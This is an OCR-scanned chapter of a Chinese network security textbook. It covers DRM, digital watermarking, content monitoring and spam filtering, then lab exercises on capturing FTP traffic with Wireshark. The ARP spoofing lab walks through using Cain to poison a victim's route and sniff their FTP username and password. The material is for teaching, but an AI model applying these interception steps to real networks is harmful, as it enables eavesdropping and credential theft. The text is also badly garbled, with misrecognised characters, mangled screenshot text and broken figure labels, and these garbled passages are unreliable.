4) 数据 可 靠 性 (加 密 ) 

在 传输 前 对 数据 进行 加 密 , 可 以 保证 在 传输 过 程 中 ,即使 数据 包 遭 截取 ,信息 也 无 法 被 
。 该 特性 在 IPSec 中 为 可 选项 ,与 IPSec 策略 的 具体 设置 相关 。 

5) 认证 

数据 源 发 送信 任 状 , 由 接收 方 验证 信任 状 的 合法 性 ,只 有 通过 认证 的 系统 , 才 可 以 建立 
通信 连接 。 

5. 内 容 保护 

互联 网 的 发 展 与 普及 使 电子 出 版 物 的 传播 和 交易 变 得 便捷 ,侵权 盗版 活动 也 呈 日 益 狙 
狐 之 势 。 为 了 打击 盗版 犯罪 ,一 方面 要 通过 立法 加 强 对 知识 产权 的 保护 , 另 一 方面 要 有 先进 
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的 技术 手段 保障 法 律 的 实施 。 

针对 内 容 保护 技术 ,大 多 数 都 是 基于 密码 学 和 隐 写 术 发 展 起 来 的 ,如 数据 锁定 、 隐 写 标 
记 、 数 字 水 印 和 数字 版 权 管理 DRM 等 技术 ,其 中 最 具有 发 展 前 景 和 实用 价值 的 是 数字 水 印 
和 数字 版 权 管理 。 

信息 隐藏 和 信息 加 密 的 区 别 : 信息 隐藏 和 信息 加 密 都 是 为 了 保护 秘密 信息 的 存储 和 传 
输 , 使 之 免 遭 敌手 的 破坏 和 攻击 ,但 它们 两 者 之 间 有 显著 的 区 别 。 信 息 加 密 是 利用 对 称 密 钥 
密码 或 公开 密 钥 密码 把 明文 变换 成 密 文 ,信息 加 密 保护 的 是 信息 的 内 容 。 信 息 隐藏 是 将 秘 
密 信 息 嵌 入 到 表面 上 看 起 来 无 害 的 宿主 信息 中 ,攻击 者 无 法 直观 地 判断 他 监视 的 信息 中 是 
否 含有 秘密 信息 。 换 句 话说 ,含有 隐匿 信息 的 宿主 信息 不 会 引起 别人 的 注意 和 怀疑 ,同时 隐 
匿 信息 又 能 够 为 版 权 者 提供 一 定 的 版 权 保护 。 

6. 版 权 保护 技术 

数据 锁定 是 指出 版 商 把 多 个 软件 或 电子 出 版 物 集成 到 一 张 光盘 上 出 售 , 盘 上 所 有 的 内 
容 均 被 分 别 进行 加 密 锁 定 ,不 同 的 用 户 买 到 的 均 是 相同 的 光盘 ,每 个 用 户 只 需 付款 买 他 所 需 
内 容 的 相应 密 钥 , 即 可 利用 该 密 钥 对 所 需 内 容 解除 锁定 ,其 余 不 被 需要 的 内 容 仍 处 于 锁定 状 
aS ,用户 是 无 法 使 用 的 。 

隐匿 标记 是 指 利用 文字 或 图 像 的 格式 (如 间距 .颜色 等 ) 特 征 隐 藏 特定 信息 。 例 如 ,在 文 
本 文件 中 , 字 与 字 间 , 行 与 行 间 均 有 一 定 的 空白 间隔 ,把 这 些 空白 间隔 精心 改变 后 ,可 以 隐藏 
某 种 编码 的 标记 信息 ,以 识别 版 权 所 有 者 ,而 文件 中 的 文字 内 容 不 必 作 任何 改动 。 

数字 水 印 是 镰 嵌 在 数据 中 ,并 且 不 影响 合法 使 用 的 具有 可 鉴别 性 的 数据 。 它 一 般 应 当 
具有 不 可 察觉 性 . 抗 氛 除 性 、 稳 健 性 和 可 解码 性 。 为 了 保护 版 权 , 可 以 在 数字 视频 内 容 中 骸 
人 水 印信 号 。 如 果 制 定 某 种 标准 ,可 以 使 数字 视频 播放 机 能 够 鉴别 到 水 印 ,一 旦 发 现在 可 写 
光盘 上 有 "不许 复制 ?的 水 印 ,就 表明 这 是 一 张 非 法 复制 的 光盘 ,因而 拒绝 播放 。 还 可 以 使 数 
字 视 频 复制 机 检测 水 印信 息 , 如 果 发 现 * 不 许 复制 ”的 水 印 ,就 不 去 复制 相应 内 容 。 

数字 版 权 管理 (Digital Rights Management,DRM) 技 术 是 专门 用 来 保护 数字 化 版 权 的 
产品 。DRM 的 核心 是 数据 加 密 和 权限 管理 ,同时 也 包含 了 上 述 提 到 的 几 种 技术 。DRM f 
别 适合 基于 互联 网 应 用 的 数字 版 权 保护 ,目前 已 经 成 为 数字 媒体 的 主要 版 权 保 护 手 段 。 

7. 内 容 监管 

在 对 合法 信息 进行 有 效 的 内 容 保 护 时 ,针对 大 量 的 充斥 暴力 色情 等 非法 内 容 的 媒体 信 
息 ( 特 别 是 网 络 媒体 信息 ) 的 内 容 监管 也 十 分 必要 。 

面向 网 络 信息 内 容 的 监管 主要 涉及 两 类 : 一 类 是 静态 信息 ,主要 是 存在 于 各 个 网 站 中 
的 数据 信息 ,如 挂 马 网 站 的 有 关 网 页 、 色 情 网 站 上 的 有 害 内 容 以 及 钓鱼 网 站 上 的 虚假 信息 
等 ; 另 一 类 是 动态 信息 ,主要 是 在 网 络 中 流动 的 数据 信息 ,如 网 络 中 传输 的 垃圾 邮件 、 色 情 及 
虚假 网 页 信息 等 。 

针对 静态 信息 的 内 容 监 管 技术 主要 包括 网 站 数据 获取 技术 ,内容 分 析 技 术 、 控 管 技 
AR. 

对 于 动态 信息 进行 内 容 监管 采取 的 技术 主要 包括 网 络 数据 获取 技术 内容 分 析 技 术 、 控 
管 技 术 等 。 有 关内 容 分 析 技 术 和 控 管 技术 部 分 ,基本 上 与 对 静态 信息 采取 的 处 理 技术 相同 。 

8. 版 权 保护 

版 权 ( 又 称 著作 权 ) 保 护 是 内 容 保 护 的 重要 部 分 ,其 最 终 目 的 不 是 “如 何 防 止 使 用 ”, 而 是 
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“如 何 控制 使 用 ”。 版 权 保 护 的 实质 是 一 种 控制 版 权 作品 使 用 的 机 制 。 

数字 版 权 保护 (DRM) 就 是 以 一 定安 全 算法 实现 对 数字 内 容 的 保护 。DRM 目的 是 从 技 
术 上 防止 数字 内 容 的 非法 复制 ,用 户 必 须 在 得 到 授权 后 ,才能 使 用 数字 内 容 。DRM 涉及 的 
主要 技术 包括 数字 标识 技术 、 安 全 和 加 密 技 术 以 及 安全 存储 技术 等 。DRM 技术 方法 主要 
有 两 类 : 一 类 是 采用 数字 水 印 技术 ; 另 一 类 是 以 数据 加 密 和 防 复制 为 核心 的 DRM 技术 。 

DRM 技术 自 产 生 以 来 ,得 到 了 工业 界 和 学 术 界 的 普遍 关注 ,被 视 为 是 数字 内 容 交 易 和 
传播 的 关键 技术 ,如 Microsoft WMRM,IBM EMMS, Real Networks Helix DRM 以 及 
Adobe Content Server 等 。 国 内 的 DRM 技术 发 展 同样 很 快 ,特别 是 在 电子 书 以 及 电子 图 书 
馆 方面 ,如 北大 方正 的 Apabi 数字 版 权 保护 技术 、 书 生 的 SEP 技术 ,超星 的 PDG 等 。DRM 
的 工作 原理 如 图 4.1.1 所 示 。 目 前 ,DRM 保护 的 内 容 主要 分 为 3 类 ,包括 电子 书 、 音 视频 文 
件 和 电子 文档 。 


9. 数字 水 印 

原始 的 水 印 (watermark) 是 指 在 制作 纸张 过 程 中 通过 改变 纸浆 纤维 密度 的 方法 而 形成 
的 ,“ 夹 "在 纸 中 ,而 不 是 在 纸 的 表面 , 迎 光 透视 时 可 以 清晰 地 看 到 有 明暗 纹理 的 图 像 或 文字 ， 
如 人 民 币 、 购 物 券 以 及 有 价 证 券 等 ,以 防止 造假 。 

BUF 7k El (digital watermark) 也 是 用 来 证 明 一 个 数字 产品 的 拥有 权 、 真 实 性 。 数 字 水 
印 是 通过 一 些 算法 嵌入 在 数字 产品 中 的 数字 信息 ,如 产品 的 序列 号 .公司 图 像 标志 以 及 有 特 
殊 意义 的 文本 等 。 数 字 水 印 分 为 可 见 数 字 水 印 和 不 可 见 数字 水 印 。 可 见 数字 水 印 主要 用 于 
声明 产品 的 所 有 权 、 著 作 权 和 来 源 ,起 到 广告 宣传 或 使 用 约束 的 作用 ,如 电视 台 播放 节目 时 
的 台 标 既 起 到 广告 宣传 作用 ,又 可 声明 所 有 权 。 不 可 见 数字 水 印 应 用 的 层次 更 高 ,制作 难度 
更 大 ,应 用 面 也 更 广 。 

一 个 数字 水 印 (后 面 简称 为 水 印 ) 方 案 一 般 包括 3 个 方面 : 水 印 的 形成 水印 的 嵌入 和 
水 印 的 检测 。 水 印 的 形成 主要 是 指 选择 有 意义 的 数据 ,以 特定 形式 生成 水 印信 息 , 如 有 意义 
的 文字 .序列 号 .数字 图 像 (商标 .印鉴 等 ) 或 者 数字 音频 片段 的 编码 。 一 般 的 水 印信 息 可 以 
根据 需要 制作 成 可 直接 阅读 的 明文 ,也 可 以 是 经 过 加 密 处 理 后 的 密 文 。 

水 印 的 嵌入 与 密码 体系 的 加 密 环 节 类 似 , 一 般 分 为 输入 .嵌入 处 理 和 输出 3 部 分 。 水 印 
嵌入 过 程 如 图 4. 1. 2 Bros 

水 印 的 检测 流程 如 图 4. 1. 3 所 示 。 水 印 的 检测 工作 主要 包括 检测 水 印 是 否 存在 和 提取 
水 印信 息 两 大 部 分 。 检 测 方 式 主要 分 为 盲 水 印 检测 和 非 盲 水 印 检测 。 其 中 , 盲 水 印 检测 主 
要 指 不 需要 原始 数据 (原始 宿主 文件 和 水 印信 息 ) 参 与 ,直接 进行 检测 水 印信 号 是 否 存 在 ; 非 
言 水 印 检测 是 在 原始 数据 参与 下 进行 水 印 检测 。 
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10. 内 容 监管 

内 容 监管 是 内 容 安全 的 另 一 个 重要 方面 ,如 果 监 管 不 善 ,会 对 社会 造成 极 大 的 影响 ,其 
重要 性 不 言 而 喻 。 内 容 监管 涉及 很 多 领域 ,其 中 基于 网 络 的 信息 已 经 成 为 内 容 监管 的 首要 
目标 。 一 般 来 说 ,病毒 ,木马 色情、 反动 严重 的 虚假 欺骗 以 及 垃圾 邮件 等 有 害 的 网 络 信 息 
都 需要 进行 监管 。 

内 容 监 管 首先 需要 解决 的 就 是 如 何 制 定 监 管 的 总 体 策略 。 总 体 策略 主要 包括 监管 的 对 
象 .监管 的 内 容 、 对 违规 内 容 如 何 处 理 等 。 首 先 , 如 何 界定 违规 内 容 ( 那 些 需要 禁止 的 信息 )， 
既 能 够 禁止 违规 内 容 , 又 不 会 丈 及 合法 应 用 。 其 次 ,对 可 能 存在 一 些 违规 信息 的 网 站 如 何 处 
理 。 一 种 方法 是 通过 防火 墙 禁止 对 该 网 站 的 全 部 访问 ,这 样 比较 安全 ,但 也 会 禁止 其 他 有 用 
的 内 容 ; 另 一 种 方法 是 允许 网 站 部 分 访问 ,只 是 对 有 害 网 页 信息 进行 拦截 ,但 此 种 方法 存在 
拦截 失败 的 可 能 性 。 

内 容 监管 系统 模型 如 图 4. 1.4 所 示 。 内 容 监管 需求 是 制定 内 容 监 管 策略 的 依据 。 内 容 
监管 策略 是 内 容 监管 需求 的 形式 化 表示 。 数 据 获取 策略 主要 确定 监管 对 象 的 范围 .采用 何 
种 方式 获取 需要 检测 的 数据 ;敏感 特征 定义 是 指 用 于 判断 网 络 信息 内 容 是 否 违规 的 特征 值 ， 
如 敏感 字符 串 .图 片 等 ;违规 定义 是 指 依据 网 络 信息 内 容 中 包含 敏感 特征 值 的 情况 判断 是 否 
违规 的 规则 ;违规 处 理 策略 是 指 对 于 违规 载体 (网 站 或 网 络 连接 ) 的 处 理 方法 ,如 禁止 对 该 网 
站 的 访问 .拦截 有 关 网 络 连 接 等 。 

1) 数据 获取 策略 

数据 获取 技术 分 为 主动 式 和 被 动 式 两 种 形式 。 

主动 式 数据 获取 是 指 通过 访问 有 关 网 络 连 接 而 获得 其 数据 内 容 ; 网 络 爬 虫 是 典型 的 主 
动 式 数据 获取 技术 。 主 动 式 数据 获取 过 程 如 图 4. 1.5 所 示 。 
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被 动 式 数据 获取 是 指 在 网 络 的 特定 位 置 设置 探 针 ,获取 流 经 该 位 置 的 所 有 数据 。 被 动 
式 数据 获取 主要 解决 两 个 方面 的 问题 : 探 针 位 置 的 选择 :对 出 和 数据 报 文 的 采集 。 被 动 式 
数据 获取 过 程 如 图 4. 1.6 所 示 。 

数据 调整 主要 指针 对 数据 获取 模块 (主要 是 协议 栈 ) 提 交 的 应 用 层 数据 进行 筛选 组合、 
解码 以 及 文本 还 原 等 工作 ,数据 调整 的 输出 结果 用 于 敏感 特征 搜索 等 。 数 据 调整 的 过 程 如 
图 4.1.7 所 示 。 

2) 敏感 特征 定义 

敏感 特征 搜索 实际 上 就 是 依据 实现 定义 好 的 敏感 特征 策略 ,在 待 查 内 容 中 识别 所 包含 
的 敏感 特征 值 ,搜索 的 结果 可 以 作为 违规 判定 的 依据 。 

敏感 特征 值 可 以 是 文本 字符 串 、 图 像 特 征 、 音 频 特 征 等 ,它们 分 别 用 于 不 同 信息 载体 的 
内 容 的 敏感 特征 识别 。 

目前 ,基于 文本 内 容 的 识别 已 经 比较 成 熟 , 并 达到 可 实用 化 ,而 图 像 .音频 特征 的 识别 还 
存在 一 些 问题 ,如 识别 率 较 低 、. 误 报 率 较 高 等 .难以 实现 全 面 有 效 的 程序 自动 监管 ,更 多 的 时 
候 需要 人 介入 。 

+ 135 + 


图 416 被 动 式 数 据 获取 过 程 
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图 417 数据 调整 的 过 程 


3) 违规 判定 及 处 理 

违规 判定 程序 的 设计 思想 : 将 敏感 特征 搜索 结果 与 违规 定义 相 比较 ,判断 该 网 络 信息 
内 容 是 否 违规 。 

违规 定义 是 说 明 违 规 内 容 应 具有 的 特征 , 即 敏感 特征 。 每 个 敏感 特征 由 敏感 特征 值 和 
特征 值 敏感 度 ( 某 特征 值 对 违规 的 影响 程度 也 可 以 看 作 权 重 ) 两 个 属性 描述 。 

敏感 特征 的 搜索 结果 具有 敏感 特征 值 的 广度 (包含 相 异 敏感 特征 值 的 数量 ) 和 敏感 特征 
值 的 深度 (包含 同一 个 特征 值 的 数量 ) 两 个 指标 。 

违规 处 理 目前 主要 采用 的 方法 与 人 侵 检测 相似 ,报警 就 是 通知 有 关 人 员 违 规 事 件 的 具 
体 情 况 ,封锁 IP 一 般 是 指 利用 防火 墙 等 网 络 设 备 阻 断 对 有 关 TP. 地 址 的 访问 ,而 拦截 连接 则 
是 针对 某 个 特定 访问 连接 实施 阻 断 ,向 通信 双方 发 送 RST 数据 包 阻 断 TCP 连接 就 是 常用 
的 拦截 方法 。 

4) 垃圾 邮件 处 理 

目前 主要 采用 的 技术 有 过 滤 、 验 证 查询 和 挑战 3 种 。 

过 滤 (filter) 技 术 相 对 来 说 是 最 简单 ,又 最 直接 的 垃圾 邮件 处 理 技术 ,主要 用 于 邮件 接 
收 系统 辨别 和 处 理 垃圾 邮件 。 基 于 过 滤 技 术 的 反 垃 圾 邮件 系统 流程 如 图 4. 1. 8 所 示 。 

验证 查询 技术 主要 指 通过 密码 验证 及 查询 等 方法 判断 邮件 是 否 为 垃圾 邮件 ,包括 反 向 
查询 ,雅虎 的 DKIM(Domain Keys Identified Mail) 技 术 、Microsoft 的 SenderID 技术 、IBM 
的 FairUCE(Fair use of Unsolicited Commercial Email) 技 术 以 及 邮件 指纹 技术 等 。 
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邮件 POP3 协 议 
服务 器 端 > 收 信 


TESEN 


| 正常 
客户 端 TZ 收 信 


邮件 


HW LN noui 


图 418 基于 过 渡 技 术 的 反 垃圾 邮件 系统 流程 
基于 挑战 的 反 垃圾 技术 是 指 通 过 延缓 邮件 处 理 过 程 ,阻碍 发 送 大 量 邮件 。 


4.2 数据 抓 包 分 析 实 验 


实验 器 材 
PC(Windows XP/Windows 7),1 £. 
预习 要 求 


(1) 做 好 实验 预习 ,复习 内 容 安全 攻击 的 有 关内 容 。 
(2) 复习 Wireshark, CAIN 的 使 用 方法 。 

(3) 熟悉 Serv-U 服务 器 的 配置 及 使 用 。 

(4) 熟悉 实验 过 程 和 基本 操作 流程 。 

(5) 做 好 预习 报告 。 


实验 任务 


加 深 并 消化 本 课程 的 授课 内 容 , 复 习 学 过 的 互联 网 搜索 技巧 .方法 和 技术 。 了 解 并 熟悉 
Serv-U 的 配置 和 使 用 ,掌握 常用 抓 包 软 件 的 使 用 方法 和 过 滤 技 巧 ,能 够 对 给 定 的 数据 包 分 
析 网 络 基本 行为 ,并 依据 结果 分 析 FTP 的 安全 性 ,达到 巩固 课程 知识 和 实际 应 用 的 目的 。 


实验 环境 

Windows XP/Windows 7 „Serv-U , Wireshark 浏览 器 。 
预备 知识 

COD Serv-U 的 配置 及 使 用 。 

(2) Wireshark 的 使 用 方法 和 过 滤 技 巧 。 

实验 步 又 


1. 下 载 并 安装 Serv-U 
Serv-U 安装 向 导 如 图 4. 2. 1 所 示 。 
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欢迎 使 用 Serv-U 安装 向 导 
即 格 安装 Serv-U 15.1.1 到 电脑 上 . 


[ope i50 d 


CARET T P. ARS 


击 “ 下 一 步 ” WR, Res “MIA” BM. 


图 421 SevU 安 装 向 导 


Serv-U 管理 控制 台 主 页 如 图 4. 2. 2 所 示 。 


~ Create, modiy. and delete LDAP user groups. 


图 422 SevU 管 理 控制 台 主 页 


2. 配置 FTP 服务 器 
(1) 新 建 域 www. test. com, MA 4. 2. 3 所 示 。 


Xem Serv-U 城 向 轩 、 水 向 导 将 帮助 侈 在 文件 服务 可 上 他 建城、 


每 个 域名 新 是 难 一 的 标识 符 ， 周 于 区 分 文件 服务 各 上 的 其 他 域 . 


Li 
www .testcom 


城 的 说 天 中 可 以 钥 合 更 多 信息 .说 避 为 可 选 内 雇 。 
LL 


>- 


Lid 


T-9»» LI 


图 423 新 建 域 wwtestoom 
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(2) 单 击 * 下 一 步 ?按钮 ,这 里 的 参数 保持 默认 值 即 可 ,其 中 FTP 端口 默认 为 21 ,也 可 以 
改 为 其 他 不 冲突 的 端口 ,如 图 4. 2.4 所 示 。 


KERA Serv-U HS. HHSAEHSETERSHLUBS. 


可 以 使用 城 迁 过 各 种 协议 报 供 对 文件 最 务 驮 的 访问 。 如 果 当 章 许 可 证 不 支持 某 些 协 
议 ， 则 这 些 协 议 可 能 无 法 使 局。 清 选 择 域 应 污 使 用 的 协议 及 其 相应 的 烧 口 。 


FIP 和 Explat SSL/TLS 2 
Implicit FTPS (SS s? 990 
dem SSH 的 SFTP CIE 
um 80 
HTTPS (SSL WEH HTTP) 443 


图 424 默认 参数 


(3) 设置 IP 地 址 进行 监听 ,以 192. 168. 22. 50 为 例 , 如 图 4.2.5 所 示 。 


KERS Serv-U CHS. ks NIEETÓBAS IMS. 


Pii T —^3eih. Seb duei d doES GE I ESI. 


192.168.2250 
t piers 
IPv6 地 址 - 
<< 所 有 可 用 的 IPW6 地 址 >> 
££ IPv6 Ex 


<< 上 一 步 下 一 步 >> LC] 


图 425 设置 P 地 址 


(4) 单 击 图 4. 2.6 中 的 “完成 ”, 在 图 4. 2.7 中 选择 * 否 ”, 在 用 户 配置 中 设置 。 
(5) 选择 域 详细 信息 ,如 图 4.2. 8 所 示 。 
(6) 将 域 根 目录 设置 为 FTP 的 目录 并 保存 ,如 图 4. 2.9 所 示 。 
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KERA Serv-U RSS. HHSSSHSETSRSH LNB. 


e ias (REATUS SREPESESEO). 使用 双向 加 密 来 保护 用 户 
RERGNEURESL ANTES. 


<< 上 一 步 eR RA 


图 426 新 建 域 完 成 


图 429 保存 FIP 目录 


CD 返回 控制 台 主 页 添加 用 户 ,用户 名 为 USER ,密码 为 PASS, 如 图 4. 2. 10 所 示 。 添 
加 用 户 成 功 后 的 界面 如 图 4. 2. 11 所 示 。 
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图 4211 添加 用 户 成 功 后 的 界面 
(8) 使 用 协议 分 析 软 件 Wireshark 设置 过 滤 规 则 为 ftp, 如 图 4. 2. 12 所 示 。 


E 422 设置 过 滤 规 则 为 人 


(9) 客户 端 使 用 FTP 命令 访问 服务 器 端 ,输入 用 户 名 和 密码 ,如 图 4. 2. 13 以 及 图 4. 2. 14 
所 示 。 


图 4213 客户 端 在 地 址 栏 输入 主机 IP 地 址 


图 4214 登录 界面 
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(100. 开始 抓 包 ,从 捕获 的 数据 包 中 分 析 用 户 名 ,口令 ,从 数据 中 可 以 分 析 得 出 用 户 名 和 
口令 分 别 是 USER 与 PASS, 如 图 4.2. 15 所 示 。 


图 4215 捕获 数据 


(11) 设置 Serv-U 的 安全 连接 功能 ,客户 端 使 用 http, https, FileZilla, cutF TP, 3& &£ +e 
又 (2) 一 (6) 看 是 否 能 保证 用 户 名 /口令 安全 。 

设置 安全 连接 功能 如 下 。 

(D http: 无 法 抓 取 ftp 数据 包 , 但 是 可 以 进入 服务 器 ,如 图 4.2.16 所 示 。 


U | Web 客户 端 
€p s 
自 se 
名 称 大 小 时 间 


© 3dd02ecd8cf246fd5ee4901c9a70 2016/2/20 下 午 2312: as 
(Cà se4a35dea92c5efc65ea4792842d68 5:1 
© 360Downloads 
© 2345AvScan 


© $RECYCLE.BIN 2016/2/19 FF 12: B 7 
e 大 = 上 2016/11/20 下 午 6:10:53 
C 留学 申请 2016/5/4 下 午 6:36:54 
O 学 校 事务 2016/9/24 下 午 5:58:13 
© aa 2016/3/27 下 午 5:49:58 
© appdata 2015/12/20 «43:27:39 
© Awenst 2016/11/26 下 午 1:48:39 
(C BaiduYunDownload 2016/8/27 上 午 10:46:21 
© BaiduYunGuanjia 2016/9/29 下 午 5:59:58 
© cache 2016/6/4 下 午 3:00:27 
© Desktop 2016/4/3, 上 午 9:37:16| 
Pa Dev-Cnn. 2016/10/7 41:46:52 


E4216 进入 服务 器 


© https: 无 法 进入 服务 器 ,如 图 4.2. 17 Bros o 


[ 区 pk/192168143 | 


427 无 法 进入 服务 器 
@ FileZilla: 从 抓 取 的 包 中 也 可 以 获取 用 户 名 和 口令 ,如 图 4.2.18 和 图 4.2.19 所 示 。 


实验 报告 要 求 


。 写 明 实 验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 
* 阐述 碰 到 的 问题 以 及 解决 方法 。 
”阐述 收获 与 体会 。 
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a -OEE RRT A 


主机 (H): 192.168.14.3 MARU): USER EAW: eem wor EONA] 


Ei: 227 Enterng Passive Mode (192,168,14,3,12,225) 
i MD 
E: 150 Opening BINARY mode data connection for MLSD. 
E: 226 Transfer complete. 1,558 bytes transferred. 1.52 KB/sec. 
HERA 


exe G: (Samsung USB) J 
x«& ^ RARA 六 a p E71 XWUUA Xm ed om 
&c mean ü- 

a0: zeae di SRecycl- xe 2012/7133. al 
dit onza Ji Boot RER © -2012/13 kos el 
ne maan "T T— ennai = 


图 4218 可 以 进入 服务 器 


-一 -一 -一 re 
Fior: | ftp =] Expression.. Clar Apply Save 


i. — Time Source. Destination Protocol Length Info 


3010 269. 597062 192,108.14. 3 192.105.14.1 73 Response: 215 UNIX Type: Lë 


3012 269, 606625 192.108.14. 3 192.168.14.1 778 Response: 211-Extensions supported 


3014 269.608731 192.168.14. 3 192.168.14.1 66 Response: 200 Noted. 


421 抓 取 的 数据 包 


4.3 ARP 欺骗 实验 


实验 器 材 

PC( Windows XP/Windows 7),1 台 。 

预习 要 求 

(1) 做 好 实验 预习 ,复习 安全 攻击 的 有 关内 容 。 

(2) 复习 Wireshark, CAIN 的 使 用 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 

实验 任务 

复习 常用 的 网 络 嗅 探 方式 ,掌握 常用 抓 包 软件 的 使 用 方法 和 过 滤 技 巧 ,能 够 对 给 定 的 数 
据 包 分 析 网 络 基本 行为 ,掌握 ARP 欺骗 的 基本 原理 。 

实验 环境 


FTP 环境 ,关闭 防火 墙 和 杀毒 软件 ,Serv-U、Wireshark 浏览 器 。 
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预备 知识 

C1) 抓 包 技术 。 

(2) FTP 技术 。 

Scy 4p 

CD. 以 默认 方式 安装 cain 及 Wireshark, 

(2) 查看 主机 IP 信息 。 在 攻击 主机 打开 命令 提示 符 ,输入 arp -a 查看 主机 IP 信息 ,如 
图 4. 3. 1 所 示 。 在 被 攻击 主机 中 打开 命令 提示 符 , 输 入 arp -a 查看 主机 IP 信息 ,如 图 4. 3.2 
所 示 。 


图 431 攻击 主机 IP 信息 


If C\WINDOWS\system32\cmd.exe [E] 


图 432 被 攻击 主机 IP 信 息 


(3) 配置 CAIN。 打 开 CAIN.CAIN 初始 界面 如 图 4. 3. 3 所 示 。 选 择 configure, 选 择 
要 进行 欺骗 的 网 卡 ,如 图 4. 3. 4 所 示 。 
选择 sniffer( 嗅 探 器 ) , 单 击 第 二 个 图 标 开 始 嗅 探 ,右键 空白 处 单 击 MAC Address 
Scanner 扫描 被 攻击 主机 区 段 内 的 MAC 地 址 ,如 图 4. 3. 5 所 示 。 扫 描 结 果 如 图 4. 3. 6 
所 示 。 
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IEPEETIJEEIEIPELLEEEELDIDEN 
[Decoders [Neve Sater [7 Caster [Vaca eT Woes [ES Om] 


Prove the + iios on the toolbar to damp the Proteced Storage 


图 433 CAN 初 始 界面 


| Fitters and ports | HTTP Fields 
Traceroute | Certificate Spoofing | Certificates Collector 
Sniffer | APR ( Arp Poison Routing) | APR-SSL Options 


MAC Address Scanner 


r Target 
C. All hosts in my subnet 
€ Range 

r From. 


p Winpcap Version 192.18. 1 . 1 


41.0.2980 TES 
192 . 168. | . 254 


[ Current Network Adapter — — — — — — — — — — —3j 
\Device\NPF_(6D35DE3E-F7E7-4E69-929E-£16E2F81C549} p Promiscuous-Mode Scanner 
T7 ARP Test (Broadcast 31-bit) 


T7 ARP Test Broadcast 1650) 
WARNING !!! Only ethernet adapters supported A 5e 
Re TT ARP Test (Group bi) 
[ Start Sniffer on startup. [7 Don't use Promiscuous mode 厂 ARP Test Multicast group 0) 
[^ ARP Test [Multicast group 1) 
LEE T7 ARP Test (Mulicast group 3} 
T^ Al Tests. 


Wok 应 用 内 wm [Lo ] ces 


图 434 被 攻击 主机 PES 图 435 扫描 mec 地 址 


从 图 4. 3. 6 中 可 以 看 到 被 攻击 主机 为 192. 168. 1. 103, 单 击 下 方 的 APR 选项 卡 , 在 右 
侧 空 白 处 单 击 , 发 现 上 方 的 “十 ” 变 成 蓝 色 , 单 击 蓝 色 加 号 , 左 侧 选 择 当 前 网 关 , 右 侧 选 择 被 攻 
击 IP, 如 图 4. 3.7 所 示 。 
(4) 开始 ARP 欺骗 。 
打开 Wireshark ,选择 当前 主机 ,在 CAIN 中 单 击 上 方 第 三 个 黄色 图 标 开 始 ARP 欺骗 ， 
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Fle View Configure Teols Hop 


olf om at |+7|3|.0mee sees? |i) 


[& Decoders [ Nework [89 snitter [5 cracker [@ Traceroute [E ccou TW wireless [ab Query] 


8089177F8934 
aDAiSTGEXCE GIGABYTE TECHNOLDS 
04D13ASAGC... 


图 436 扫描 结果 


New ARP poison Routing 


"WARNING It 


‘enables you to hijack IP traffic between the selected host on the left list and all selected hosts on the right list in both 
directions. If selector hoe! Fes tong coped eine WAN ffc Wl be eec sped nr well Pese nel nal apo jour 
machine has not the same performance of a router you could cause DoS if you set APR between your Default Gateway and 
all other hosts on your LAN. 


192.168.1.1 8083177F8834 192 168.1.100 04D13A5A3C06 
192.168.1.103 74043519 2CF 
192.168.1.100 040134549006 


图 437 选择 被 攻击 主机 IP 


可 以 看 到 Wireshark 中 的 信息 如 图 4.3. 8 所 示 。 


425 129.476650 
426 129.476773 


427 129.477278 
408 129.477478 
423 129.477593 


"IW has B :TEST 
42 Who has 192.168. Tell 192.168.1.1 (duplicate use of 192.168.1.1 deteci 
60 192.168.1.1 1s at 80: 7:85:34 
42 192.168.1.103 is at 9: 277 

(duplicate use of 192.168.1.103 
60 192.168.1.163 is at 74: icf (duplicate use of 192.168.1.1 


图 438 AFPHRUR Wreshak rh 548 


在 攻击 主机 中 再 次 输入 arp -a, 显 示 信 息 有 所 变化 ,如 图 4. 3. 9 所 示 。 
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Bl C:\WINDOWS\system32\cmd.exe = o X 


图 439 AP 欺骗 导致 信息 发 生变 化 


(5) 登录 FTP。 
在 被 攻击 主机 上 登录 FTP 查看 Wireshark 中 的 数据 ,可 以 看 到 用 户 名 和 密码 的 传输 如 
图 4.3. 10 所 示 。 


(CQ 121 OICQ Protocol 


1618. 375.790258 — 192 


1618. 376.797765 — 192.168.1.103 192.168.1.109 TCP 60 53722 + 21 [ACK] Sea-l Ack-l Min-262144 Len-9 
1618. 376.798273 — 192.168.1.109 192.168.1.103 FTP 81 Response: 220 soft FIP Service 


1618. 375.799103  192.168.1.103 192.168.1.109 Tp 60 53722 + 21 [ACK] Seqel Ack=28 Win=261888 Len-e 
1618. 376.799374 — 192.168.1.103 192.168.1.109 FTP 64 Request: USER que 

1618. 375.799513 — 192.168.1.109 192.168.1.103 FTP 77 Response: 331 Password required 

1618. 375.800115 — 192.168.1.103 192.168.1.109 Tee 60 53722 + 21 [ACK] Saq=11 Ack=51 Win=251888 Len=-@ 

1618. 376.800147 192.168.1.103 192.168.1.109 FTP 67 Request: PAS: 

1618. 375.800932 — 192.168.1.109 192.168.1.103 FTP 75 Response: 238 User logged in. 

1618. 375.801809 — 192.168.1.103 1.109 Tp 60 53722 + 21 [ACK] Saq=24 Ack=72 Win=261888 Len=0 

1618. 376.801811 — 192.168.1.103 1.209 FTP 68 Request: opts utfü on 

1618. 375.802123 — 192.168.1.109 1.103 FTP 112 Response: 200 OPTS UTFB command successful - UTFB encoding now ON. 
1618. 375.802969 — 192.168.1.103 1.108 Tee 60 53722 + 21 [ACK] Saq=38 Ack-138 Win=261888 Len=0 

1618. 376.803227 — 192.168.1.103 .1.109 FIP 60 Request: PWD 

1618. 375.800407 — 192.168.1.109 1.103 FTP 85 Response: 257 "/" is current directory 


图 4310 登录 FIP 查 看 Wreshak 中 的 数据 


在 选项 卡 中 选择 passwords, AF FTP 项 ,发 现 登 录 的 账号 密码 已 
所 示 ,实验 结束 。 

。 写 明 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 

* 阐述 碰 到 的 问题 以 及 解决 方法 。 

。 阐述 收获 与 体会 。 


现 , 如 图 4.3 
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Ele View Cenfigure Tools Hop 


IEIDEETTIJEESIENPEETTIITEEDZILXAT S 


| [Æ Decoders [F mework [i snitter [3 Cracker [@ Traceroute [ER ccou TY wireless [b Query] 


IMAP (0) 

f LDAP o) 

POPs (0) 

